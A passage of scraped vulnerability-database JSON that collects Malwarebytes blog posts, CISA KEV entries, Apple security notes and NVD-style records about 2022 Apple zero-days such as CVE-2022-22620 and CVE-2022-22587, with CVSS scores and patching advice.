Or [Malwarebytes for iOS](<https://support.malwarebytes.com/hc/en-us/categories/360002468273-Malwarebytes-for-iOS>) for your Apple devices.\n\nAs this latest vulnerability is already being exploited, it's really important that you update your devices as soon as you can. Stay safe!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T14:00:00", "type": "malwarebytes", "title": "[updated] Important update! iPhones, Macs, and more vulnerable to zero-day bug", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917"], "modified": "2022-09-13T14:00:00", "id": "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-now-apple-devices-are-exposed-to-a-new-zero-day-flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T22:07:44", "description": "There are many reasons why we want a bug fixed as soon as we can, but there are also plenty of reasons why doing it \u201cright now\u201d is not an option. This phenomenon starts at the side of the developers. The average time to fix a bug seems to vary depending on the platform the bug was found in. What is one group doing better and can the others take lessons from that? Or is it something we have to take as it comes?\n\n&quot;Bug-fixing time&quot; refers to the time required to fix known bugs. So, on a per bug basis it is the time between being made aware of an existing bug and issuing a fix for the bug. The ability to better understand and predict bug-fixing time can help a project team better estimate software maintenance efforts and better manage software projects.\n\n## Reasons to fix ASAP\n\nThere are some very obvious reasons why we want to push and install bug fixes as soon as possible.\n\n * Improved security by fixing the vulnerability.\n * Even if a vulnerability is found by a researcher taking the high road of responsible disclosure, once the cat is out of the bag, there is a good chance others will be able to duplicate the researcher&#x27;s effort. This could result in a zero-day vulnerability.\n * When you are working on a new version, a critical bug in the old version is holding you back as long as you don\u2019t know how to fix it.\n * If the published timeline shows it has taken months to fix a bug it reflects badly on your company, and could lead customers to question whether you care about security.\n\nIn general, you can say that the bug-fixing time is an important factor for bug related analysis, such as measuring software quality. Having your software considered to be \u201cbuggy\u201d does not helps sales in any way. But situations may arise when you need to prioritize what needs to be fixed first.\n\n## Differences in platform\n\nLast month, the Project Zero team at Google looked at fixed bugs that were reported between January 2019 and December 2021. During this period, Project Zero reported 376 issues to vendors under their standard 90-day deadline.\n\nWhen [reading the data](<https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html>), it is important to note that the number of issues is too small and not chosen randomly enough to give a full picture, but it gives you an idea at least.\n\nVendor| Total bugs| Fixed by day 90| Fixed during grace period| Exceeded deadline and grace period| Avg days to fix \n---|---|---|---|---|--- \nApple| 84| 73 (87%)| 7 (8%)| 4 (5%)| 69 \nMicrosoft| 80| 61 (76%)| 15 (19%)| 4 (5%)| 83 \nGoogle| 56| 53 (95%)| 2 (4%)| 1 (2%)| 44 \nLinux| 25| 24 (96%)| 0 (0%)| 1 (4%)| 25 \nAdobe| 19| 15 (79%)| 4 (21%)| 0 (0%)| 65 \nMozilla| 10| 9 (90%)| 1 (10%)| 0 (0%)| 46 \nSamsung| 10| 8 (80%)| 2 (20%)| 0 (0%)| 72 \n \nOverall, the data show that almost all of the big vendors here are coming in under 90 days, on average.\n\n## Complaints from bug bounty hunters\n\nAt this point it should be pointed out that bugs reported by the Project Zero team are reported to vendors directly and will be taken very seriously by the vendors.\n\nIndividual bounty hunters, however, have been complaining about getting their bugs accepted. For example, in January we saw [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a vulnerability in Apple\u2019s IOMobileFrameBuffer, where a malicious app could execute random code with kernel privileges. This vulnerability ended up being a zero-day vulnerability that was exploited in the wild after one of them posted a Proof-of-Concept (PoC).\n\nMany researchers that don\u2019t want to report to vendors directly make use of the Zero-Day-Initiative (ZDI). The ZDI was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there have been complaints from researchers that they didn\u2019t feel they were taken seriously by the ZDI.\n\n## The next step\n\nSo, yes, it&#x27;s important to fix vulnerabilities ASAP, but why does it take so long sometimes before these fixes and patches get installed?\n\nAccording to recent podcast guest Jess Dodson, the problem of patching isn\u2019t just a problem of resources\u2014time, staffing, funding\u2014but also of mindset. For some organizations, refusing to patch almost brings with it a bizarre sense of pride, Dodson said.\n\nThis video cannot be displayed because your _Functional Cookies_ are currently disabled. \n \nTo enable them, please visit our _[privacy policy](<https://www.malwarebytes.com/privacy/#how-we-collect-information>)_ and search for the Cookies section. Select _&quot;Click Here&quot;_ to open the Privacy Preference Center and select _&quot;Functional Cookies&quot;_ in the menu. You can switch the tab back to _&quot;Active&quot;_ or disable by moving the tab to _&quot;Inactive.&quot;_ Click _&quot;Save Settings.&quot;_\n\nFinally, even if you are not a Federal Civilian Executive Branch (FCEB) agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list known as the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) can act as a good guideline for your patch management strategy. This catalog provides FCEB agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nThe post [The struggle to reduce bug-fixing time is real](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-07T20:06:37", "type": "malwarebytes", "title": "The struggle to reduce bug-fixing time is real", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-07T20:06:37", "id": "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-11T14:18:19", "description": "Apple has released a security fix for a zero-day vulnerability ([CVE-2022-22620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22620>)) that it says &quot;may have been actively exploited.&quot; According to the security update information provided by [Apple](<https://support.apple.com/en-us/HT213092>) the vulnerability exists in WebKit\u2014the HTML rendering engine component of its Safari browser\u2014and can be used by an attacker to create web content that may lead to arbitrary code execution.\n\nApple says it has addressed this vulnerability with improved memory management in iOS 15.3.1, iPadOS 15.3.1, macOS Monterey 12.2.1, and Safari 15.3.\n\n### Vulnerability\n\nThe vulnerability is a use-after-free (UAF) issue in WebKit that could lead to OS crashes and code execution on compromised devices. Use after free (UAF) is a type of vulnerability that results from the incorrect use of dynamic memory during a program\u2019s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.\n\nThis issue can be exploited when WebKit processes HTML content. The attacker can exploit this vulnerability by luring users to visit a specially crafted web page. Once the user opens the malicious web page, an attacker can remotely execute malicious code on the targeted system. The vulnerability has been reported publicly as being exploited in the wild and was reported by an anonymous researcher.\n\nWebKit is the browser engine that powers Safari on Macs as well as all browsers on iOS and iPadOS (browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux. \n\n### Affected devices\n\nUsers owning the following devices should install the update as soon as possible:\n\n * iOS 15.3.1 and iPadOS 15.3.1 can be found on iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n * macOS Monterey 12.2.1 for all systems running macOS Monterey (MacBooks, iMacs, Mac minis, and Mac Pros)\n * All devices running macOS Big Sur and macOS Catalina which are using Safari.\n\nStay safe, everyone!\n\nThe post [Update now! Apple fixes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-02-11T11:27:06", "type": "malwarebytes", "title": "Update now! Apple fixes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T11:27:06", "id": "MALWAREBYTES:180975C3E3516E431BF7664666327048", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-11-27T15:38:46", "description": "Apple IOMobileFrameBuffer contains a memory corruption vulnerability which can allow a malicious application to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "Apple Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2022-22587", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-27T15:38:46", "description": "Apple Webkit, which impacts iOS, iPadOS, and macOS, contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa_kev", "title": "Apple Webkit Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA-KEV-CVE-2022-22620", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:36:45", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**Obligado1** at May 03, 2022 7:06am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2023-10-07T00:00:00", "id": "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "href": "https://attackerkb.com/topics/82P5tenpQJ/cve-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:10", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2023-10-07T00:00:00", "id": "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B", "href": "https://attackerkb.com/topics/ZFSs2HwdT4/cve-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2023-11-27T15:22:54", "description": "# About the security content of Safari 15.3\n\nThis document describes the security content of Safari 15.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## Safari 15.3*\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\n* After installing this update, the build number for Safari 15.3 is 16612.4.9.1.8 on macOS Big Sur and 15612.4.9.1.8 on macOS Catalina.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of Safari 15.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:02740BCB30C345C4CD19795FBD8FD739", "href": "https://support.apple.com/kb/HT213091", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:22:55", "description": "# About the security content of iOS 15.3.1 and iPadOS 15.3.1\n\nThis document describes the security content of iOS 15.3.1 and iPadOS 15.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 15.3.1 and iPadOS 15.3.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 02, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.3.1 and iPadOS 15.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:52E627AE8868F50352A397AD32DB5373", "href": "https://support.apple.com/kb/HT213093", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:22:58", "description": "# About the security content of macOS Monterey 12.2.1\n\nThis document describes the security content of macOS Monterey 12.2.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Monterey 12.2.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.2.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:EF619761E522E15BAB653ACD81383CBF", "href": "https://support.apple.com/kb/HT213092", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-20T23:24:52", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "id": "PRION:CVE-2022-22594", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-20T23:24:52", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "id": "PRION:CVE-2022-22587", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T23:24:55", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "PRION:CVE-2022-22620", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-27T14:24:43", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 